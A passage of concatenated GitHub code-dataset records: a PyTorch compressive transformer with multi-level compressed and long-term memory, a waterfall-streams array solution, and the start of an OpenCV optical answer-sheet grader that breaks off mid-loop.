Rectangle\"\r\n else:\r\n return \"Invalid rectangle\"\r\n","repo_name":"vara0715/PRM-Assignment","sub_path":"prm_q2.py","file_name":"prm_q2.py","file_ext":"py","file_size_in_byte":908,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"31848979771","text":"# Modified from https://github.com/lucidrains/compressive-transformer-pytorch\n\nimport math\nimport sys\nfrom collections import namedtuple\nfrom functools import partial\nfrom inspect import isfunction\nfrom typing import Type, Tuple, List, Union\n\nimport torch\nimport torch.nn.functional as F\nfrom torch import nn, Tensor\n\n# structs\n\nMemory: Type[Tuple[Tensor, List[Tensor], Tensor]] = namedtuple('Memory', ['mem', 'compressed_mem', 'lt_mem'])\n\n\n# helper functions\n\ndef to(t):\n return {'dtype': t.dtype, 'device': t.device}\n\n\ndef cast_tuple(el):\n return el if isinstance(el, tuple) else (el,)\n\n\ndef default(x, val):\n if x is not None:\n return x\n return val if not isfunction(val) else val()\n\n\ndef max_neg_value(tensor):\n return -torch.finfo(tensor.dtype).max\n\n\ndef reshape_dim(t, dim, split_dims):\n shape = list(t.shape)\n num_dims = len(shape)\n dim = (dim + num_dims) % num_dims\n shape[dim:dim + 1] = split_dims\n return t.reshape(shape)\n\n\ndef split_at_index(dim, index, t):\n pre_slices = (slice(None),) * dim\n l = (*pre_slices, slice(None, index))\n r = (*pre_slices, slice(index, None))\n return t[l], t[r]\n\n\ndef queue_fifo(*args, length, dim=-2):\n queue = torch.cat(args, dim=dim)\n if length > 0:\n return split_at_index(dim, -length, queue)\n\n device = queue.device\n shape = list(queue.shape)\n shape[dim] = 0\n return queue, torch.empty(shape, device=device)\n\n\ndef shift(x):\n *_, i, j = x.shape\n zero_pad = torch.zeros((*_, i, i), **to(x))\n x = torch.cat([x, zero_pad], -1)\n l = i + j - 1\n x = x.view(*_, -1)\n zero_pad = torch.zeros(*_, -x.size(-1) % l, **to(x))\n shifted = torch.cat([x, zero_pad], -1).view(*_, -1, l)\n return shifted[..., :i, i - 1:]\n\n\ndef iterate_tensor(t):\n length = t.shape[0]\n for ind in range(length):\n yield t[ind]\n\n\n# full attention for calculating auxiliary reconstruction loss\n\ndef full_attn(q, k, v, dropout_fn=None):\n *_, dim = q.shape\n dots = torch.einsum('bhid,bhjd->bhij', q, k) * (dim ** -0.5)\n attn = dots.softmax(dim=-1)\n if dropout_fn is not None:\n attn = dropout_fn(attn)\n return torch.einsum('bhij,bhjd->bhid', attn, v)\n\n\n# helper classes\n\nclass Residual(nn.Module):\n def __init__(self, fn):\n super().__init__()\n self.fn = fn\n\n def forward(self, x, **kwargs):\n out = self.fn(x, **kwargs)\n out = cast_tuple(out)\n ret = (out[0] + x), *out[1:]\n return ret\n\n\nclass GRUGating(nn.Module):\n def __init__(self, dim, fn, mogrify=False):\n super().__init__()\n self.dim = dim\n self.fn = fn\n self.gru = nn.GRUCell(dim, dim)\n if mogrify:\n try:\n # noinspection PyPackageRequirements\n from mogrifier import Mogrifier\n self.mogrify = Mogrifier(dim, factorize_k=dim // 4) if mogrify else None\n except ImportError:\n print('!! 
mogrify is set, but mogrifier library not available!'\n ' Run \"pip install mogrifier\" to fix.', file=sys.stderr)\n\n def forward(self, x, **kwargs):\n batch, dim = x.shape[0], self.dim\n out = self.fn(x, **kwargs)\n (y, *rest) = cast_tuple(out)\n\n if self.mogrify is not None:\n y, x = self.mogrify(y, x)\n\n gated_output = self.gru(\n y.reshape(-1, dim),\n x.reshape(-1, dim)\n )\n\n gated_output = gated_output.reshape(batch, -1, dim)\n ret = gated_output, *rest\n return ret\n\n\nclass PreNorm(nn.Module):\n def __init__(self, dim, fn):\n super().__init__()\n self.norm = nn.LayerNorm(dim)\n self.fn = fn\n\n def forward(self, x, **kwargs):\n x = self.norm(x)\n return self.fn(x, **kwargs)\n\n\nclass ConvCompress(nn.Module):\n def __init__(self, dim, ratio=4):\n super().__init__()\n self.conv = nn.Conv1d(dim, dim, ratio, stride=ratio)\n\n def forward(self, mem):\n mem = mem.transpose(1, 2)\n compressed_mem = self.conv(mem)\n return compressed_mem.transpose(1, 2)\n\n\nclass DetachedConvCompress(nn.Module):\n def __init__(self, reference: ConvCompress):\n super().__init__()\n self.reference = reference\n\n def forward(self, mem):\n weight = self.reference.conv.weight.detach()\n bias = self.reference.conv.bias.detach()\n\n mem = mem.transpose(1, 2)\n compressed_mem = F.conv1d(mem, weight, bias, self.reference.conv.stride,\n self.reference.conv.padding, self.reference.conv.dilation,\n self.reference.conv.groups)\n return compressed_mem.transpose(1, 2)\n\n\n# feedforward\n\nclass GELU_(nn.Module):\n def forward(self, x):\n return 0.5 * x * (1 + torch.tanh(math.sqrt(2 / math.pi) * (x + 0.044715 * torch.pow(x, 3))))\n\n\nGELU = nn.GELU if hasattr(nn, 'GELU') else GELU_\n\n\nclass FeedForward(nn.Module):\n def __init__(self, dim, ff_dim, dropout=0., activation=None, glu=False):\n super().__init__()\n activation = default(activation, GELU)\n\n self.glu = glu\n self.w1 = nn.Linear(dim, ff_dim * (2 if glu else 1))\n self.act = activation()\n self.dropout = nn.Dropout(dropout)\n self.w2 = nn.Linear(ff_dim, dim)\n\n def forward(self, x, **kwargs):\n if not self.glu:\n x = self.w1(x)\n x = self.act(x)\n else:\n x, v = self.w1(x).chunk(2, dim=-1)\n x = self.act(x) * v\n\n x = self.dropout(x)\n x = self.w2(x)\n return x\n\n\nclass CompressionStage(nn.Module):\n\n def __init__(self, dim, cmem_ratio, cmem_len, attn_heads, attn_dim_heads, reconstruction_attn_dropout,\n prev_lvl_mem_start_index, prev_lvl_mem_len) -> None:\n super().__init__()\n self.attn_heads = attn_heads # of the containing SelfAttention object\n self.attn_dim_heads = attn_dim_heads\n self.mem_len_this_lvl = cmem_len\n self.prev_lvl_mem_start_index = prev_lvl_mem_start_index\n self.prev_lvl_mem_len = prev_lvl_mem_len\n\n assert prev_lvl_mem_len % cmem_ratio == 0, \\\n f'mem length of previous level ({prev_lvl_mem_len}) must be divisble by compression ratio ({cmem_ratio})'\n\n self.reconstruction_attn_dropout = nn.Dropout(reconstruction_attn_dropout)\n self.compress_mem_fn = ConvCompress(dim, cmem_ratio)\n self.compress_mem_fn_without_grad = DetachedConvCompress(self.compress_mem_fn)\n\n def forward(self, prev_cmem_this_lvl, old_mem_prev_lvl, prev_lvl_mem_len, q, k, v, to_kv_weight):\n compressed_mem = self.compress_mem_fn_without_grad(old_mem_prev_lvl)\n old_cmem, new_cmem = split_at_index(1, -self.mem_len_this_lvl,\n torch.cat((prev_cmem_this_lvl, compressed_mem), dim=1))\n aux_loss = torch.zeros(1, requires_grad=True, **to(prev_cmem_this_lvl))\n\n if not self.training:\n return old_cmem, new_cmem, aux_loss\n\n # calculate compressed memory 
auxiliary loss if training\n merge_heads = lambda x: reshape_dim(x, -1, (-1, self.attn_dim_heads)).transpose(1, 2)\n\n compressed_mem = self.compress_mem_fn(old_mem_prev_lvl.detach())\n cmem_k, cmem_v = F.linear(compressed_mem, to_kv_weight.detach()).chunk(2, dim=-1)\n cmem_k, cmem_v = map(merge_heads, (cmem_k, cmem_v))\n cmem_k, cmem_v = map(lambda x: x.expand(-1, self.attn_heads, -1, -1), (cmem_k, cmem_v))\n\n old_mem_range = slice(- min(prev_lvl_mem_len, self.prev_lvl_mem_len) - self.prev_lvl_mem_start_index,\n -self.prev_lvl_mem_start_index)\n old_mem_k, old_mem_v = map(lambda x: x[:, :, old_mem_range].clone(), (k, v))\n\n q, old_mem_k, old_mem_v = map(torch.detach, (q, old_mem_k, old_mem_v))\n\n attn_fn = partial(full_attn, dropout_fn=self.reconstruction_attn_dropout)\n\n aux_loss = F.mse_loss(\n attn_fn(q, old_mem_k, old_mem_v),\n attn_fn(q, cmem_k, cmem_v)\n )\n\n return old_cmem, new_cmem, aux_loss\n\n\n# attention.\n\nclass SelfAttention(nn.Module):\n\n @staticmethod\n def validate_cmem_parameters(seq_len: int, mem_len: int,\n cmem_lengths: List[int], cmem_ratios: Union[List[int], int]):\n assert len(cmem_lengths) == len(cmem_ratios), f'{cmem_lengths}, {cmem_ratios} should have same length!'\n compression_levels = len(cmem_lengths)\n # compression stage 0 is mem -> cmem\n one_input_block_size = seq_len\n for i in range(compression_levels):\n assert one_input_block_size >= cmem_ratios[i], \\\n f'At compression level {i}, one input block of {seq_len} tokens is already reduced to ' \\\n f'{one_input_block_size} compressed tokens, cannot be compressed again with ratio {cmem_ratios[i]}'\n assert cmem_lengths[i] >= (one_input_block_size // cmem_ratios[i]), \\\n f'length of compressed memory at level {i + 1} should be at least the compressed input block length ' \\\n f'at level {i} ({one_input_block_size}) divided by the compression ratio {cmem_ratios[i]}, ' \\\n f'i.e. at least {int(one_input_block_size // cmem_ratios[i])}'\n one_input_block_size //= cmem_ratios[i]\n\n # simulate information flow\n log = ''\n mem = 0\n cmems = [0] * compression_levels\n while True: # simulate until lt mem would be filled. then, sizes do not change anymore (everything full)\n mem += seq_len\n log += f'i={seq_len} -> '\n if mem <= mem_len:\n log += f'm={mem}\\n'\n continue\n old_mem = mem - mem_len\n mem = mem_len\n log += f'm={mem} -> {old_mem}'\n for lvl in range(compression_levels):\n log += f' --/{cmem_ratios[lvl]}--> c{lvl}='\n assert old_mem % cmem_ratios[lvl] == 0, \\\n f'mem length {old_mem} from previous layer not divisible by compression ratio {cmem_ratios[lvl]} ' \\\n f'at compression level {lvl}. 
Log:\\n{log}'\n cmems[lvl] += old_mem // cmem_ratios[lvl]\n if cmems[lvl] <= cmem_lengths[lvl]:\n log += f'{cmems[lvl]}'\n old_mem = 0\n break\n old_mem = cmems[lvl] - cmem_lengths[lvl]\n cmems[lvl] = cmem_lengths[lvl]\n log += f'{cmems[lvl]} -> {old_mem}'\n log += '\\n'\n if old_mem > 0:\n break\n\n def __init__(self, dim, seq_len, mem_len: int,\n cmem_lengths: List[int], cmem_ratios: Union[List[int], int],\n use_ltmem=True,\n heads=8, attn_dropout=0., dropout=0.,\n reconstruction_attn_dropout=0., one_kv_head=False):\n super().__init__()\n assert (dim % heads) == 0, 'dimension must be divisible by the number of heads'\n if isinstance(cmem_ratios, int):\n cmem_ratios = [cmem_ratios] * len(cmem_lengths)\n SelfAttention.validate_cmem_parameters(seq_len, mem_len, cmem_lengths, cmem_ratios)\n\n self.heads = heads\n self.dim_head = dim // heads\n self.seq_len = seq_len\n self.mem_len = mem_len\n self.num_cmem_stages = len(cmem_lengths)\n self.cmem_lengths = cmem_lengths\n self.cmem_ratios = cmem_ratios\n self.use_ltmem = use_ltmem\n self.scale = self.dim_head ** (-0.5)\n\n self.compression_stages = nn.ModuleList()\n running_start_index = self.seq_len\n prev_length = mem_len\n for i in range(self.num_cmem_stages):\n self.compression_stages.append(CompressionStage(\n dim, cmem_ratios[i], cmem_lengths[i], heads, self.dim_head,\n reconstruction_attn_dropout,\n prev_lvl_mem_start_index=running_start_index,\n prev_lvl_mem_len=prev_length))\n prev_length = cmem_lengths[i]\n running_start_index += prev_length\n\n if self.use_ltmem:\n self.cmem_to_ltmem_query = nn.Parameter(torch.zeros(dim), requires_grad=True)\n self.ltmem_tokv = nn.Linear(dim, dim * 2, bias=False)\n self.recurrence = nn.GRUCell(dim, dim, bias=False)\n\n self.to_q = nn.Linear(dim, dim, bias=False)\n\n kv_dim = self.dim_head if one_kv_head else dim\n self.to_kv = nn.Linear(dim, kv_dim * 2, bias=False)\n self.to_out = nn.Linear(dim, dim)\n\n self.attn_dropout = nn.Dropout(attn_dropout)\n self.dropout = nn.Dropout(dropout)\n\n def forward(self, x, memories=None, pos_emb=None, input_mask=None, calc_memory=True, **kwargs):\n b, t, e, h, dim_h = *x.shape, self.heads, self.dim_head\n\n memories: Memory = default(memories, (None, None, None))\n mem, cmems, ltmem = memories\n\n init_empty_mem = lambda: torch.empty(b, 0, e, **to(x))\n mem = default(mem, init_empty_mem)\n cmems = default(cmems, lambda: [init_empty_mem() for i in range(self.num_cmem_stages)])\n ltmem = default(ltmem, init_empty_mem)\n\n mem_len = mem.shape[1]\n cmem_len_sum = sum(cmem.shape[1] for cmem in cmems)\n ltmem_len = ltmem.shape[1]\n assert 0 <= ltmem_len <= 1, str(ltmem)\n\n q = self.to_q(x)\n\n if self.num_cmem_stages == 0:\n kv_input = torch.cat((ltmem, mem, x), dim=1)\n else:\n kv_input = torch.cat((ltmem, *cmems, mem, x), dim=1)\n kv_len = kv_input.shape[1]\n k, v = self.to_kv(kv_input).chunk(2, dim=-1)\n\n merge_heads = lambda x: reshape_dim(x, -1, (-1, dim_h)).transpose(1, 2)\n q, k, v = map(merge_heads, (q, k, v))\n\n k, v = map(lambda x: x.expand(-1, h, -1, -1), (k, v))\n\n dots = torch.einsum('bhid,bhjd->bhij', q, k) * self.scale\n mask_value = max_neg_value(dots)\n\n if pos_emb is not None:\n pos_emb = pos_emb[:, -kv_len:].type(q.dtype)\n pos_dots = torch.einsum('bhid,hjd->bhij', q, pos_emb) * self.scale\n pos_dots = shift(pos_dots)\n dots = dots + pos_dots\n\n if input_mask is not None:\n mask = input_mask[:, None, :, None] * input_mask[:, None, None, :]\n mask = F.pad(mask, [mem_len + cmem_len_sum + ltmem_len, 0], value=True)\n dots.masked_fill_(~mask, 
mask_value)\n\n total_mem_len = mem_len + cmem_len_sum + ltmem_len\n mask = torch.ones(t, t + total_mem_len, **to(x)).triu_(diagonal=1 + total_mem_len).bool()\n dots.masked_fill_(mask[None, None, ...], mask_value)\n\n attn = dots.softmax(dim=-1)\n attn = self.attn_dropout(attn)\n\n out = torch.einsum('bhij,bhjd->bhid', attn, v)\n out = out.transpose(1, 2).reshape(b, t, -1)\n logits = self.to_out(out)\n logits = self.dropout(logits)\n\n new_mem = mem\n new_cmems = cmems\n new_ltmem = ltmem\n aux_loss = torch.zeros(1, requires_grad=False, **to(q))\n\n if self.seq_len > t or not calc_memory:\n return logits, Memory(new_mem, new_cmems, new_ltmem), aux_loss\n\n # calculate memory and compressed memory\n\n old_mem, new_mem = queue_fifo(mem, x, length=self.mem_len, dim=1)\n old_mem_padding = old_mem.shape[1] % self.cmem_ratios[0]\n\n if old_mem_padding != 0:\n old_mem = F.pad(old_mem, [0, 0, old_mem_padding, 0], value=0.)\n\n if old_mem.shape[1] == 0 or self.num_cmem_stages <= 0:\n return logits, Memory(new_mem, new_cmems, new_ltmem), aux_loss\n\n prev_mem_len = mem_len\n old_mem_prev_lvl = old_mem\n for i in range(self.num_cmem_stages):\n if old_mem_prev_lvl.size(1) == 0:\n break\n old_mem_prev_lvl, new_cmems[i], lvl_aux_loss = self.compression_stages[i](\n prev_cmem_this_lvl=cmems[i],\n old_mem_prev_lvl=old_mem_prev_lvl,\n prev_lvl_mem_len=prev_mem_len,\n q=q, k=k, v=v,\n to_kv_weight=self.to_kv.weight\n )\n aux_loss += lvl_aux_loss\n prev_mem_len = cmems[i].size(1)\n\n if old_mem_prev_lvl.size(1) > 0 and self.use_ltmem:\n old_cmem_k, old_cmem_v = (self.ltmem_tokv(old_mem_prev_lvl)\n .unsqueeze(dim=1) # Insert fake head dimension\n .chunk(2, dim=-1))\n to_ltmem_query = self.cmem_to_ltmem_query.expand(b, 1, 1, e) # b x 1(=h) x 1(=seq) x e\n ltmem_update = full_attn(to_ltmem_query, old_cmem_k, old_cmem_v)\n if ltmem_len > 0:\n new_ltmem = self.recurrence(ltmem_update.view(b, e), ltmem.squeeze(dim=1)).unsqueeze(dim=1)\n else:\n new_ltmem = ltmem_update.squeeze(dim=1) # Remove heads dimension\n\n return logits, Memory(new_mem, new_cmems, new_ltmem), aux_loss\n\n\n# transformer\n\nclass CompressiveTransformer(nn.Module):\n def __init__(self, num_tokens, dim, seq_len, depth, emb_dim=None,\n memory_layers=None, mem_len=None,\n cmem_lengths: List[int] = None, cmem_ratios: Union[int, List[int]] = 4,\n use_ltmem=True,\n heads=8, gru_gated_residual=True, mogrify_gru=False, attn_dropout=0.,\n ff_glu=False, ff_dim=None, ff_dropout=0.,\n attn_layer_dropout=0., reconstruction_attn_dropout=0., reconstruction_loss_weight=1.,\n one_kv_head=False):\n super().__init__()\n if isinstance(cmem_ratios, int):\n if cmem_lengths is None:\n cmem_ratios = [cmem_ratios]\n else:\n cmem_ratios = [cmem_ratios] * len(cmem_lengths)\n else:\n assert cmem_lengths is not None\n assert len(cmem_lengths) == len(cmem_ratios)\n\n ff_dim = default(ff_dim, dim * 4)\n emb_dim = default(emb_dim, dim)\n mem_len = default(mem_len, seq_len)\n cmem_lengths = default(cmem_lengths, [mem_len // cmem_ratios[0]])\n memory_layers = default(memory_layers, list(range(1, depth + 1)))\n\n assert mem_len >= seq_len, 'length of memory should be at least the sequence length'\n assert all(\n [0 < layer <= depth for layer in memory_layers]), 'one of the indicated memory layers is invalid'\n\n self.seq_len = seq_len\n\n self.depth = depth\n self.memory_layers = list(memory_layers)\n self.num_cmem_stages = len(cmem_lengths)\n\n self.token_emb = nn.Embedding(num_tokens, emb_dim)\n self.to_model_dim = nn.Identity() if emb_dim == dim else nn.Linear(emb_dim, 
dim)\n\n seq_and_mem_len = seq_len + mem_len + sum(cmem_lengths) + (1 if use_ltmem else 0) # + 1 for LT Memory\n self.pos_emb = nn.Parameter(torch.zeros(heads, seq_and_mem_len, dim // heads), requires_grad=True)\n\n self.to_logits = nn.Sequential(\n nn.Identity() if emb_dim == dim else nn.Linear(dim, emb_dim),\n nn.Linear(emb_dim, num_tokens)\n )\n\n wrapper = partial(GRUGating, dim, mogrify=mogrify_gru) if gru_gated_residual else Residual\n\n self.attn_layers = nn.ModuleList([\n wrapper(PreNorm(dim, SelfAttention(\n dim, seq_len, mem_len,\n cmem_lengths if (i + 1) in memory_layers else [],\n cmem_ratios if (i + 1) in memory_layers else [],\n use_ltmem and (i + 1) in memory_layers,\n heads, dropout=attn_layer_dropout,\n attn_dropout=attn_dropout,\n reconstruction_attn_dropout=reconstruction_attn_dropout,\n one_kv_head=one_kv_head\n ))) for i in range(depth)])\n self.ff_layers = nn.ModuleList(\n [wrapper(PreNorm(dim, FeedForward(dim, ff_dim, dropout=ff_dropout, glu=ff_glu))) for _ in range(depth)])\n\n self.reconstruction_loss_weight = reconstruction_loss_weight\n\n def forward(self, x, memories=None, mask=None):\n input_device = x.device\n x = self.token_emb(x)\n x = self.to_model_dim(x)\n b, t, d = x.shape\n\n assert t <= self.seq_len, f'input contains a sequence length {t} that is greater than the designated maximum ' \\\n f'sequence length {self.seq_len} '\n\n memories = default(memories, (None, None, None))\n mem, cmems, ltmem = memories\n\n num_memory_layers = len(self.memory_layers)\n init_empty_mem = lambda: torch.empty(num_memory_layers, b, 0, d, **to(x))\n mem = default(mem, init_empty_mem)\n cmems = default(cmems, lambda: [init_empty_mem() for i in range(self.num_cmem_stages)])\n ltmem = default(ltmem, init_empty_mem)\n\n total_len = mem.shape[2] + sum(cmem.shape[2] for cmem in cmems) + ltmem.shape[2] + self.seq_len\n pos_emb = self.pos_emb[:, (self.seq_len - t):total_len]\n\n # Lists of {c,lt,}mem per transformer layer\n next_mem = []\n next_cmems = []\n next_ltmem = []\n aux_loss = torch.tensor(0., requires_grad=True, **to(x))\n\n mem_iter, ltmem_iter = map(iterate_tensor, (mem, ltmem))\n cmems_iter = ([cmem[i] for cmem in cmems] for i in range(num_memory_layers))\n\n for ind in range(self.depth):\n x, mem_out, cmems_out, ltmem_out, layer_aux_loss \\\n = self._pass_through_layer(ind, mem_iter, cmems_iter, ltmem_iter, mask, pos_emb, x)\n aux_loss = aux_loss + layer_aux_loss\n\n if (ind + 1) not in self.memory_layers:\n continue\n\n next_mem.append(mem_out)\n next_cmems.append(cmems_out)\n next_ltmem.append(ltmem_out)\n\n out = self.to_logits(x)\n\n next_mem, next_ltmem = map(torch.stack, (next_mem, next_ltmem))\n next_cmems = [torch.stack([next_cmems[layer][cstage] for layer in range(num_memory_layers)])\n for cstage in range(self.num_cmem_stages)]\n\n aux_loss = aux_loss * self.reconstruction_loss_weight / num_memory_layers\n out = out.to(device=input_device)\n return out, Memory(mem=next_mem, compressed_mem=next_cmems, lt_mem=next_ltmem), aux_loss\n\n def _pass_through_layer(self, ind, mem_iter, cmems_iter, ltmem_iter, mask, pos_emb, x):\n attn = self.attn_layers[ind]\n ff = self.ff_layers[ind]\n\n layer_num = ind + 1\n use_memory = layer_num in self.memory_layers\n memories = (next(mem_iter), next(cmems_iter), next(ltmem_iter)) if use_memory else None\n _dev = lambda t: t.to(device=x.device)\n memories = (_dev(memories[0]), [_dev(m) for m in memories[1]], _dev(memories[2])) if memories else None\n\n x, (mem_out, cmems_out, ltmem_out), layer_aux_loss = attn(x, 
memories=memories, calc_memory=use_memory,\n input_mask=mask, pos_emb=pos_emb)\n x, = ff(x)\n\n return x, mem_out, cmems_out, ltmem_out, layer_aux_loss\n\n\nclass MultiDeviceCompressiveTransformer(CompressiveTransformer):\n \"\"\"\n CompressiveTransformer with model parallelism.\n Note: Start fairseq-train with\n --distributed-no-spawn\n --distributed-world-size 1\n to prevent data parallelism\n \"\"\"\n\n def __init__(self, num_tokens, dim, seq_len, depth, emb_dim=None, memory_layers=None, mem_len=None,\n cmem_lengths: List[int] = None, cmem_ratios: Union[int, List[int]] = 4, use_ltmem=True, heads=8,\n gru_gated_residual=True, mogrify_gru=False, attn_dropout=0., ff_glu=False, ff_dim=None, ff_dropout=0.,\n attn_layer_dropout=0., reconstruction_attn_dropout=0., reconstruction_loss_weight=1.,\n one_kv_head=False,\n layers_to_gpus=None):\n super().__init__(num_tokens, dim, seq_len, depth, emb_dim, memory_layers, mem_len, cmem_lengths, cmem_ratios,\n use_ltmem, heads, gru_gated_residual, mogrify_gru, attn_dropout, ff_glu, ff_dim, ff_dropout,\n attn_layer_dropout, reconstruction_attn_dropout, reconstruction_loss_weight, one_kv_head)\n\n gpus = torch.cuda.device_count()\n layers_to_gpus = default(layers_to_gpus, [int(i / self.depth * gpus) for i in range(self.depth)])\n assert len(layers_to_gpus) == self.depth\n assert all(0 <= x < gpus for x in layers_to_gpus)\n self.layers_to_gpus = layers_to_gpus\n\n def cuda(self, device=None):\n # pos_emb, token_emb, to_model_dim and to_logits always stays on device 0\n self.pos_emb = nn.Parameter(self.pos_emb.cuda(), requires_grad=True)\n self.token_emb.to(device=0)\n self.to_model_dim.to(device=0)\n self.to_logits.to(device=torch.cuda.device_count() - 1)\n for i in range(self.depth):\n self.attn_layers[i].to(device=self.layers_to_gpus[i])\n self.ff_layers[i].to(device=self.layers_to_gpus[i])\n return self\n\n def _apply(self, fn):\n fake = torch.empty(0)\n if fn(fake).device.type == 'cuda' and fn(fake).device != fake.device:\n return self.cuda()\n else:\n # noinspection PyProtectedMember\n return super()._apply(fn)\n\n def _pass_through_layer(self, ind, mem_iter, cmems_iter, ltmem_iter, mask, pos_emb, x):\n gpu = self.layers_to_gpus[ind]\n\n x = x.to(device=gpu)\n pos_emb = pos_emb.to(device=gpu)\n mask = mask.to(device=gpu) if mask else None\n x, mem_out, cmems_out, ltmem_out, layer_aux_loss = super()._pass_through_layer(\n ind, mem_iter, cmems_iter, ltmem_iter, mask, pos_emb, x)\n\n mem_out = mem_out.to(device=0) if mem_out is not None else None\n cmems_out = [m.to(device=0) for m in cmems_out] if cmems_out is not None else None\n ltmem_out = ltmem_out.to(device=0) if ltmem_out is not None else None\n layer_aux_loss = layer_aux_loss.to(device=0) if layer_aux_loss is not None else None\n\n return x, mem_out, cmems_out, ltmem_out, layer_aux_loss\n","repo_name":"lbaermann/qaego4d","sub_path":"model/external/compressive_transformer.py","file_name":"compressive_transformer.py","file_ext":"py","file_size_in_byte":25977,"program_lang":"python","lang":"en","doc_type":"code","stars":13,"dataset":"github-code","pt":"48"} +{"seq_id":"3748244550","text":"# O(w^2 * h) time | O(w) space - where w and h are the width and height of\n# the array.\ndef waterfallStreams(array, source):\n rowAbove = array[0][:]\n # Set initial water source\n rowAbove[source] = -1\n\n for row in range(1, len(array)):\n currentRow = array[row][:]\n\n # Loop through each cell in row\n for idx in range(len(rowAbove)):\n valueAbove = rowAbove[idx]\n\n # Two bools, \n # one if we have water 
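# Value convention used in this waterfall record (noted here for clarity):
# water is tracked as a negative quantity -- the source cell starts at -1 --
# so it cannot collide with block cells (1) or empty cells (0), and the final
# row is converted to percentages via num * -100. Worked micro-example of the
# split handled below: a -1 stream that hits a block divides into two -0.5
# streams routed left and right; if one of those later hits another block it
# splits again into -0.25 each, which the last line reports as 25 (percent).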
above, \n hasWaterAbove = valueAbove < 0\n # other if we are a block.\n hasBlock = currentRow[idx] == 1\n\n if not hasWaterAbove:\n continue\n\n if not hasBlock:\n # If there is no block in the current column, move the water down.\n currentRow[idx] += valueAbove\n continue \n\n # If water above and block...\n splitWater = valueAbove / 2\n \n # Move water right.\n rightIdx = idx\n while rightIdx + 1 < len(rowAbove):\n rightIdx += 1\n if rowAbove[rightIdx] == 1: # If there is a block in the way\n break \n if currentRow[rightIdx] != 1: # If there is no block below us\n currentRow[rightIdx] += splitWater\n break \n\n # Move water left.\n leftIdx = idx \n while leftIdx - 1 >= 0:\n leftIdx -= 1\n if rowAbove[leftIdx] == 1:\n break \n if currentRow[leftIdx] != 1:\n currentRow[leftIdx] += splitWater\n break \n rowAbove = currentRow\n\n finalPercentages = list(map(lambda num: num * -100, rowAbove))\n return finalPercentages\n\n\nif __name__ == '__main__':\n array = [\n [0, 0, 0, 0, 0, 0, 0],\n [1, 0, 0, 0, 0, 0, 0],\n [0, 0, 1, 1, 1, 0, 0],\n [0, 0, 0, 0, 0, 0, 0],\n [1, 1, 1, 0, 0, 1, 0],\n [0, 0, 0, 0, 0, 0, 1],\n [0, 0, 0, 0, 0, 0, 0],\n ]\n source = 3\n print(waterfallStreams(array, source))","repo_name":"jprice8/interview-prep","sub_path":"arrays/waterfallStreams.py","file_name":"waterfallStreams.py","file_ext":"py","file_size_in_byte":2110,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"48"} +{"seq_id":"25666859436","text":"import cv2\nimport numpy as np\nimport utlis\n\n\n########################################################################\nwebCamFeed = True\npathImage = \"5.jpg\"\ncap = cv2.VideoCapture(1)\ncap.set(10,160)\nheightImg = 700\nwidthImg = 700\nquestions=5\nchoices=5\nans= [1,2,0,2,4]\n########################################################################\n\n\ncount=0\n\nwhile True:\n\n if webCamFeed:success, img = cap.read()\n else:img = cv2.imread(pathImage)\n img = cv2.resize(img, (widthImg, heightImg)) # RESIZE IMAGE\n imgFinal = img.copy()\n imgBlank = np.zeros((heightImg,widthImg, 3), np.uint8) # CREATE A BLANK IMAGE FOR TESTING DEBUGGING IF REQUIRED\n imgGray = cv2.cvtColor(img, cv2.COLOR_BGR2GRAY) # CONVERT IMAGE TO GRAY SCALE\n imgBlur = cv2.GaussianBlur(imgGray, (5, 5), 1) # ADD GAUSSIAN BLUR\n imgCanny = cv2.Canny(imgBlur,10,70) # APPLY CANNY \n\n try:\n ## FIND ALL COUNTOURS\n imgContours = img.copy() # COPY IMAGE FOR DISPLAY PURPOSES\n imgBigContour = img.copy() # COPY IMAGE FOR DISPLAY PURPOSES\n contours, hierarchy = cv2.findContours(imgCanny, cv2.RETR_EXTERNAL, cv2.CHAIN_APPROX_NONE) # FIND ALL CONTOURS\n cv2.drawContours(imgContours, contours, -1, (0, 255, 0), 10) # DRAW ALL DETECTED CONTOURS\n rectCon = utlis.rectContour(contours) # FILTER FOR RECTANGLE CONTOURS\n biggestPoints= utlis.getCornerPoints(rectCon[0]) # GET CORNER POINTS OF THE BIGGEST RECTANGLE\n gradePoints = utlis.getCornerPoints(rectCon[1]) # GET CORNER POINTS OF THE SECOND BIGGEST RECTANGLE\n\n \n\n if biggestPoints.size != 0 and gradePoints.size != 0:\n\n # BIGGEST RECTANGLE WARPING\n biggestPoints=utlis.reorder(biggestPoints) # REORDER FOR WARPING\n cv2.drawContours(imgBigContour, biggestPoints, -1, (0, 255, 0), 20) # DRAW THE BIGGEST CONTOUR\n pts1 = np.float32(biggestPoints) # PREPARE POINTS FOR WARP\n pts2 = np.float32([[0, 0],[widthImg, 0], [0, heightImg],[widthImg, heightImg]]) # PREPARE POINTS FOR WARP\n matrix = cv2.getPerspectiveTransform(pts1, pts2) # GET TRANSFORMATION MATRIX\n imgWarpColored = cv2.warpPerspective(img, matrix, 
(widthImg, heightImg)) # APPLY WARP PERSPECTIVE\n\n # SECOND BIGGEST RECTANGLE WARPING\n cv2.drawContours(imgBigContour, gradePoints, -1, (255, 0, 0), 20) # DRAW THE BIGGEST CONTOUR\n gradePoints = utlis.reorder(gradePoints) # REORDER FOR WARPING\n ptsG1 = np.float32(gradePoints) # PREPARE POINTS FOR WARP\n ptsG2 = np.float32([[0, 0], [325, 0], [0, 150], [325, 150]]) # PREPARE POINTS FOR WARP\n matrixG = cv2.getPerspectiveTransform(ptsG1, ptsG2)# GET TRANSFORMATION MATRIX\n imgGradeDisplay = cv2.warpPerspective(img, matrixG, (325, 150)) # APPLY WARP PERSPECTIVE\n\n # APPLY THRESHOLD\n imgWarpGray = cv2.cvtColor(imgWarpColored,cv2.COLOR_BGR2GRAY) # CONVERT TO GRAYSCALE\n imgThresh = cv2.threshold(imgWarpGray, 170, 255,cv2.THRESH_BINARY_INV )[1] # APPLY THRESHOLD AND INVERSE\n\n boxes = utlis.splitBoxes(imgThresh) # GET INDIVIDUAL BOXES\n cv2.imshow(\"Split Test \", boxes[3])\n countR=0\n countC=0\n myPixelVal = np.zeros((questions,choices)) # TO STORE THE NON ZERO VALUES OF EACH BOX\n for image in boxes:\n #cv2.imshow(str(countR)+str(countC),image)\n totalPixels = cv2.countNonZero(image)\n myPixelVal[countR][countC]= totalPixels\n countC += 1\n if (countC==choices):countC=0;countR +=1\n\n # FIND THE USER ANSWERS AND 